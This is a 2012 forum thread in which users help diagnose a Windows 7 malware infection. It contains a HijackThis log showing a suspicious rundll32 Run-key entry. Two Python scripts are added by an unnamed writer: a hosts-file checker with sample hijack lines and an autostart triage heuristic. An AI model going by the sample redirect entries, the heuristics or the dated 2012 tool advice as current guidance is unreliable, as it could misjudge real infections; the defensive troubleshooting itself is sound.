Title: [Solved] Windows infection: please help a security newbie
Post by: dree12 on July 22, 2012, 09:58:10 PM
My computer with Bitcoin on it has become infected. There isn't anything of value to worry about. The wallet is encrypted and backed up. And, I doubt the malware currently infecting the system is interested in stealing it anyways. Right now, I'm more interested in salvaging the system (a clean install is likely to be both time-consuming and overwrite many files I didn't consider important enough to back up onto my limited 4GB thumb drive).
I suspect the culprit is a rootkit. Neither Kaspersky's TDSSKiller nor Symantec's ZeroAccess rootkit killer found anything though. Malwarebytes is taking a long time to scan, and is at 2 infected objects found. I suspect Microsoft Safety Scanner has found the same two items. How the malware bypassed UAC is unknown.
The websites I visit should mostly come from the "safe sector of the net", and no websites in history are immediately suspicious. However, I do notice that "Adobe installation helper" has recently been run. This is the most likely culprit.
The symptoms of the infection are diverse. I'll try to list some of the most obvious ones below:
- The system is extremely slow and input is often interrupted.
- Some services are missing (not stopped, but gone): Background Intelligent Transfer, Microsoft Antispyware, Windows Update, and Windows Firewall (probably more).
- As a consequence, MSE, Windows Firewall, and Windows Update are disabled and cannot be enabled.
- Google and Bing search results are sometimes randomly redirected to garbage websites.
My system is a genuine Windows 7 Professional install. Any help would be greatly appreciated.
Title: Re: Windows infection: please help a security newbie
Post by: Raoul Duke on July 22, 2012, 10:04:47 PM
Run this: http://www.surfright.nl/en/hitmanpro/
No installation is needed, so it may save your day.
Title: Re: Windows infection: please help a security newbie
Post by: finkleshnorts on July 22, 2012, 10:30:16 PM
Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
Title: Re: Windows infection: please help a security newbie
Post by: unclemantis on July 22, 2012, 10:38:27 PM
I really need to get around to just biting the bullet and running nothing but Linux.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 22, 2012, 11:03:33 PM
Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
One of the advantages Bitcoin offers is greater security :).
Running GMER right now. Meanwhile, I'm copying the files I mentioned to a USB key. Hopefully this works.
Title: Re: Windows infection: please help a security newbie
Post by: amencon on July 22, 2012, 11:04:21 PM
To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the NoScript plugin. This way no script is run without your consent and knowledge.
As for your current infection, Malwarebytes and ComboFix are a good start. The browser hijacking may be due to a modified HOSTS file (how to reset the file: http://pctechnotes.com/how-to-reset-windows-hosts-file/).
If Malwarebytes/ComboFix/GMER doesn't set you straight, update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
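An added example (my code, not from the thread or from any tool named in it) of the hosts-file check amencon suggests: a stock Windows hosts file maps nothing but localhost, so any other name deserves a look, and a search-engine name pinned to a routable address is exactly the redirect trick. The sample hosts content is constructed; the only real value is the standard location under %SystemRoot%\System32\drivers\etc\hosts, which the script reads when it is present and otherwise ignores.

```python
import ipaddress
import os

# Constructed sample, not the poster's real hosts file. The google/bing
# lines model the redirect amencon describes; ads.example.net models a
# benign ad-blocking entry that must not be mistaken for a hijack.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
203.0.113.10    www.google.com google.com
203.0.113.10    www.bing.com
0.0.0.0         ads.example.net
"""

# Where Windows keeps the file; it is read only if it exists on this box.
WINDOWS_HOSTS = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"),
                             "System32", "drivers", "etc", "hosts")


def parse_hosts(text):
    """Return (address, hostname) pairs. Blank lines and comments are
    skipped; a line with several names yields one pair per name."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        address, *names = line.split()
        for name in names:
            pairs.append((address, name.lower()))
    return pairs


def classify_hosts(text):
    """Return (address, hostname, verdict) for every mapping except
    localhost. Pointing a name at the local machine (127.0.0.1, 0.0.0.0,
    ::1) merely blocks it; pointing it anywhere else silently redirects
    it, which is how a search-engine hijack via the hosts file works."""
    findings = []
    for address, name in parse_hosts(text):
        if name == "localhost":
            continue
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            findings.append((address, name, "unparseable address"))
            continue
        if ip.is_loopback or ip.is_unspecified:
            findings.append((address, name, "blocked"))
        else:
            findings.append((address, name, "redirected"))
    return findings


def redirected_names(text):
    """Only the hostnames that would be sent somewhere else."""
    return [name for _, name, verdict in classify_hosts(text)
            if verdict == "redirected"]


if __name__ == "__main__":
    source = SAMPLE_HOSTS
    if os.path.exists(WINDOWS_HOSTS):
        with open(WINDOWS_HOSTS, encoding="utf-8", errors="replace") as fh:
            source = fh.read()
    for address, name, verdict in classify_hosts(source):
        print(f"{verdict:11} {name:30} -> {address}")
```

On a machine whose search results keep landing on junk sites, an empty "redirected" list from this check is what lets you rule the hosts file out and move on to the browser add-ons and Run keys, which is what dree12 ends up doing further down the thread.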
Title: Re: Windows infection: please help a security newbie
Post by: finkleshnorts on July 22, 2012, 11:11:02 PM
Same thing happened to me. I ran GMER and some other tool on it, nothing was found, but I knew I was in trouble. My credit card ended up being used at an ATM in Russia shortly after. I just switched to Linux and changed all my PINs and passwords.
One of the advantages Bitcoin offers is greater security :). I consider myself lucky that they didn't get into my wallet or private keys (ditched those). The VISA refund was nice, too. Good luck!
Title: Re: Windows infection: please help a security newbie
Post by: myrkul on July 22, 2012, 11:13:06 PM
To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the NoScript plugin. This way no script is run without your consent and knowledge.
This^ Ever since I switched to Firefox+NoScript, the only experiences I've had with malware of any sort is clearing it off my friends' computers.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 22, 2012, 11:42:26 PM
To the best of my knowledge even "safe sector of the internet" sites sometimes let ads with malicious code slip through. I'd recommend in the future running a browser with the NoScript plugin. This way no script is run without your consent and knowledge.
As for your current infection, Malwarebytes and ComboFix are a good start. The browser hijacking may be due to a modified HOSTS file (how to reset the file: http://pctechnotes.com/how-to-reset-windows-hosts-file/).
If Malwarebytes/ComboFix/GMER doesn't set you straight, update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
Thanks. The hosts file is normal. The computer recently bluescreened, bringing Malwarebytes down with it (it's running again). ComboFix isn't working (can't write "iexplore.exe"). I'm backing up the other important things now, in case worst comes to worst and a fresh install is necessary.
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 22, 2012, 11:43:31 PM
To get Malwarebytes to run properly, open the folder where Malwarebytes resides and rename the .exe to explorer.exe or firefox.exe. Now right-click your renamed .exe and run it as admin. Malwarebytes should run as normal. Some infections block specific processes by name.
Malwarebytes is a specialized scanner that doesn't look for common infections, so you will need another scanner to look for other issues. WinMHR, after your Malwarebytes scan, would be a good choice. They supply all of the AV companies with samples, so their database is much more complete, but it doesn't clean, only detects known non-rootkit malware.
After running WinMHR, you may have an MD5 to compare on a site like VirusTotal in their hash search. This will tell you which AV companies are detecting it and so which ones can clean it.
Cheers
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 22, 2012, 11:51:10 PM
If Malwarebytes/ComboFix/GMER doesn't set you straight, update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
Curious here too. Malwarebytes is probably not worth messing with in this situation. Be sure to boot up in safe mode and then run ComboFix and GMER. I noticed you said you tried TDSSKiller. Have you tried running RootkitRevealer? Do them all in safe mode first. If you still are not getting anything, you can try running Process Explorer from MS. It often will allow you to detect 'unusual' entries that may not be obvious to the kit finders. If all else fails, post us a copy of your HijackThis log. Cheers
Title: Re: Windows infection: please help a security newbie
Post by: check_status on July 23, 2012, 12:03:09 AM
Have you tried running RootkitRevealer?
Really!! Mark still keeps this tool up to date? I thought he stopped developing it in 2008.
Do them all in safe mode first.
Some infections run even in safe mode, so this is not a solution.
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 12:08:53 AM
To get Malwarebytes to run properly, open the folder where Malwarebytes resides and rename the .exe to explorer.exe or firefox.exe. Now right-click your renamed .exe and run it as admin. Malwarebytes should run as normal. Some infections block specific processes by name.
Malwarebytes is a specialized scanner that doesn't look for common infections, so you will need another scanner to look for other issues. WinMHR, after your Malwarebytes scan, would be a good choice. They supply all of the AV companies with samples, so their database is much more complete, but it doesn't clean, only detects known non-rootkit malware.
After running WinMHR, you may have an MD5 to compare on a site like VirusTotal in their hash search. This will tell you which AV companies are detecting it and so which ones can clean it.
Cheers
Noted. Malwarebytes is running fine.
If Malwarebytes/ComboFix/GMER doesn't set you straight, update the thread and let us know what still isn't working right.
Always be wary of the system in the future if you decide not to "nuke it from orbit" though.
Curious here too. Malwarebytes is probably not worth messing with in this situation. Be sure to boot up in safe mode and then run ComboFix and GMER. I noticed you said you tried TDSSKiller. Have you tried running RootkitRevealer? Do them all in safe mode first. If you still are not getting anything, you can try running Process Explorer from MS. It often will allow you to detect 'unusual' entries that may not be obvious to the kit finders. If all else fails, post us a copy of your HijackThis log. Cheers
RootkitRevealer doesn't work on Windows 7.
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 20:04:54, on 2012-07-22
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16447)
Boot mode: Normal
Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\System32\rundll32.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft IntelliPoint\ipoint.exe
C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe
C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\OpenOffice.org 3\program\soffice.exe
C:\Program Files\TortoiseSVN\bin\TSVNCache.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\OpenOffice.org 3\program\soffice.bin
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\Macromed\Flash\FlashUtil32_11_3_300_265_ActiveX.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Users\~\AppData\Local\Temp\Temp1_ProcessExplorer.zip\procexp.exe
C:\Users\~\Downloads\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://ca.msn.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer, optimized for Bing and MSN
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: (no name) - - (no file)
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Windows Live Messenger Companion Helper - {9FDDE16B-836F-4806-AB1F-1455CBEFF289} - C:\Program Files\Windows Live\Companion\companioncore.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [Microsoft Default Manager] "C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [IntelliPoint] "c:\Program Files\Microsoft IntelliPoint\ipoint.exe"
O4 - HKLM\..\Run: [TortoiseHgOverlayIconServer] C:\Program Files\TortoiseHg\TortoiseHgOverlayServer.exe
O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
O4 - Startup: OpenOffice.org 3.4.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MIF5BA~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MIF5BA~1\Office14\ONBttnIE.dll/105
O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://www.w3.org
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
O16 - DPF: {339C1EE2-1029-46B8-81F1-360217F26FC4} (PowerCreator VGAPlayer Control) - http://mms.hwjyw.com/courseware///courseware/2008-2-28/pengjunjiangzuo31204167051316/VGAPlayer.cab
O16 - DPF: {444785F1-DE89-4295-863A-D46C3A781394} - http://webplayer.unity3d.com/download_webplayer-2.x/UnityWebPlayer.cab
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab
O16 - DPF: {A8F2B9BD-A6A0-486A-9744-18920D898429} - http://www.sibelius.com/download/software/win/ActiveXPlugin.cab
O16 - DPF: {D1278801-B2C0-4332-BD3E-2F64D2204EDF} (Windows Live Mesh Upload Tool) - https://www.mesh.com/0.9.4014.21/TSWeb.cab
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: DirMngr - Unknown owner - C:\Program Files\GNU\GnuPG\dirmngr.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update Service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
-- End of file - 6224 bytes
(edited to remove my name, which means the byte count is incorrect)
I'm wondering, is it usually good practice to move the coins to a new wallet in this situation? The wallet is encrypted with a decent passphrase.
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:21:21 AM
Do them all in safe mode first. Some infections run even in safe mode, so this is not a solution.
It is not a solution. It's the right way to do it. Sorry, I also did not realize this thread was supposed to be a tech support 'wang off'. ;p
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:28:43 AM
What is this:
O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
Nothing else stands out to me, at least.
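As an added example (my code, not from the thread and not a HijackThis feature), here is the triage a responder does by eye on the O4 and O23 lines, written as a script: autostart entries whose image lives under a user-writable directory, rundll32 being used to load a DLL out of the user profile (which is exactly the wrorap line singled out above), and services with no publisher string are pulled out, and a helper computes the MD5 and SHA-256 that the VirusTotal hash search check_status mentions needs. The sample lines are copied from the log posted in this thread; the user-writable directory list and the path heuristics are my own assumptions.

```python
import hashlib
import re

# Entries copied from the HijackThis log posted in this thread; only the
# autostart (O4) and service (O23) lines are needed for this check.
HJT_LINES = [
    r'O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe',
    r'O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey',
    r'O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep',
    r'O4 - Startup: OpenOffice.org 3.4.lnk = C:\Program Files\OpenOffice.org 3\program\quickstart.exe',
    r'O23 - Service: DirMngr - Unknown owner - C:\Program Files\GNU\GnuPG\dirmngr.exe',
    r'O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe',
]

# Directories a standard user can write to without a UAC prompt (my own
# list, an assumption rather than anything HijackThis knows). Code that
# autostarts from here is not proof of infection, but it is where this
# kind of malware lives, so it goes to the top of the hash-and-look-up list.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
# Signed Windows binaries whose whole job is running someone else's DLL.
DLL_HOSTS = ("rundll32.exe", "regsvr32.exe")

RUN_RE = re.compile(r'^O4 - (?P<hive>HK\w+)\\\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<cmd>.*)$')
STARTUP_RE = re.compile(r'^O4 - Startup: (?P<name>.+?) = (?P<cmd>.*)$')
SERVICE_RE = re.compile(r'^O23 - Service: (?P<name>.+?) - (?P<owner>.+?) - (?P<path>.+)$')
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
DRIVE_RE = re.compile(r'^[A-Za-z]:\\')


def image_paths(cmd):
    """Drive-rooted paths in a Run-key command line. HijackThis quotes
    paths containing spaces, so an unquoted command is taken whole; a
    quoted one is tokenised and every drive-rooted token is kept."""
    if not cmd.startswith('"'):
        return [cmd] if DRIVE_RE.match(cmd) else []
    tokens = [a or b for a, b in TOKEN_RE.findall(cmd)]
    return [t for t in tokens if DRIVE_RE.match(t)]


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def triage(lines):
    """Return the entries worth hashing first as dicts: entry, path, reason."""
    findings = []
    for line in lines:
        m = RUN_RE.match(line) or STARTUP_RE.match(line)
        if m:
            paths = image_paths(m.group('cmd'))
            if not paths:
                continue
            host = paths[0].lower().rsplit('\\', 1)[-1]
            for index, path in enumerate(paths):
                if not in_user_writable(path):
                    continue
                if host in DLL_HOSTS and index > 0:
                    reason = host + ' loading a DLL from a user-writable path'
                else:
                    reason = 'autostart image in a user-writable path'
                findings.append({'entry': m.group('name'), 'path': path, 'reason': reason})
            continue
        m = SERVICE_RE.match(line)
        if m and (m.group('owner') == 'Unknown owner' or in_user_writable(m.group('path'))):
            findings.append({'entry': m.group('name'), 'path': m.group('path'),
                             'reason': 'service with no publisher string or odd location; verify the binary'})
    return findings


def hash_bytes(data):
    """MD5 and SHA-256 of a blob, the values a VirusTotal hash search takes."""
    return {'md5': hashlib.md5(data).hexdigest(),
            'sha256': hashlib.sha256(data).hexdigest()}


def hash_file(path):
    """Hashes of a file on disk, or None when it is not present (the log's
    paths exist only on the infected machine, not on the analyst's)."""
    try:
        with open(path, 'rb') as fh:
            return hash_bytes(fh.read())
    except OSError:
        return None


if __name__ == '__main__':
    for finding in triage(HJT_LINES):
        print(f"[{finding['entry']}] {finding['path']}\n    {finding['reason']}")
        print('    hashes:', hash_file(finding['path']) or 'file not available here')
```

Run on the infected machine itself, hash_file would return the digests of wrorap.dll for a hash lookup; the DirMngr hit is there to show that "Unknown owner" only means the service has no company string, so that entry gets verified rather than deleted (it is GnuPG's directory manager sitting in Program Files).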
Title: Re: Windows infection: please help a security newbie
Post by: sadpandatech on July 23, 2012, 12:30:57 AM
If you do feel the need to move your coins, be sure to do it from a clean computer.
Did you mention the spec on your machine?
What processor, ram, vid card?
Title: Re: Windows infection: please help a security newbie
Post by: dree12 on July 23, 2012, 12:34:45 AM
What is this:
O4 - HKCU\..\Run: [wrorap] "C:\Windows\System32\rundll32.exe" "C:\Users\~\AppData\Roaming\wrorap.dll",SetStep
Do I "fix" it?
If you do feel the need to move your coins, be sure to do it from a clean computer.
Did you mention the spec on your machine?
What processor, ram, vid card?
DxDiag output:
------------------
System Information
------------------
Time of this report: 7/22/2012, 20:32:16
Machine name: ~-PC
Operating System: Windows 7 Professional 32-bit (6.1, Build 7601) Service Pack 1 (7601.win7sp1_gdr.120330-1504)
Language: English (Regional Setting: English)
System Manufacturer: Dell Inc.
System Model: Inspiron 1545
BIOS: Phoenix ROM BIOS PLUS Version 1.10 A07
Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz (2 CPUs), ~2.0GHz
Memory: 3072MB RAM
Available OS Memory: 3034MB RAM
Page File: 2120MB used, 3946MB available
Windows Dir: C:\Windows
DirectX Version: DirectX 11
DX Setup Parameters: Not found
User DPI Setting: Using System DPI
System DPI Setting: 96 DPI (100 percent)
DWM DPI Scaling: Disabled
DxDiag Version: 6.01.7601.17514 32bit Unicode
------------
DxDiag Notes
------------
Display Tab 1: No problems found.
Sound Tab 1: No problems found.
Input Tab: No problems found.
--------------------
DirectX Debug Levels
--------------------
Direct3D: 0/4 (retail)
DirectDraw: 0/4 (retail)
DirectInput: 0/5 (retail)
DirectMusic: 0/5 (retail)
DirectPlay: 0/9 (retail)
DirectSound: 0/5 (retail)
DirectShow: 0/6 (retail)
---------------
Display Devices
---------------
Card name: Mobile Intel(R) 4 Series Express Chipset Family
Manufacturer: Intel Corporation
Chip type: Mobile Intel(R) 4 Series Express Chipset Family
DAC type: Internal
Device Key: Enum\PCI\VEN_8086&DEV_2A42&SUBSYS_02AA1028&REV_07
Display Memory: 1325 MB
Dedicated Memory: 64 MB
Shared Memory: 1261 MB
Current Mode: 1366 x 768 (32 bit) (60Hz)
Monitor Name: Generic PnP Monitor
Monitor Model: unknown
Monitor Id: SEC5441
Native Mode: 1366 x 768(p) (59.998Hz)
Output Type: Internal
Driver Name: igdumdx32.dll,igd10umd32.dll
Driver File Version: 8.15.0010.2302 (English)
Driver Version: 8.15.10.2302
DDI Version: 10
Driver Model: WDDM 1.1
Driver Attributes: Final Retail
Driver Date/Size: 2/11/2011 19:09:48, 571904 bytes
WHQL Logo'd: Yes
WHQL Date Stamp:
Device Identifier: {D7B78E66-6902-11CF-667B-A022A7C2C535}
Vendor ID: 0x8086
Device ID: 0x2A42
SubSys ID: 0x02AA1028
Revision ID: 0x0007
Driver Strong Name: oem23.inf:Intel.Mfg:iCNT0:8.15.10.2302:pci\ven_8086&dev_2a42
Rank Of Driver: 00E62001
Video Accel: ModeMPEG2_A ModeMPEG2_C ModeWMV9_B ModeWMV9_C ModeVC1_B ModeVC1_C
Deinterlace Caps: {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
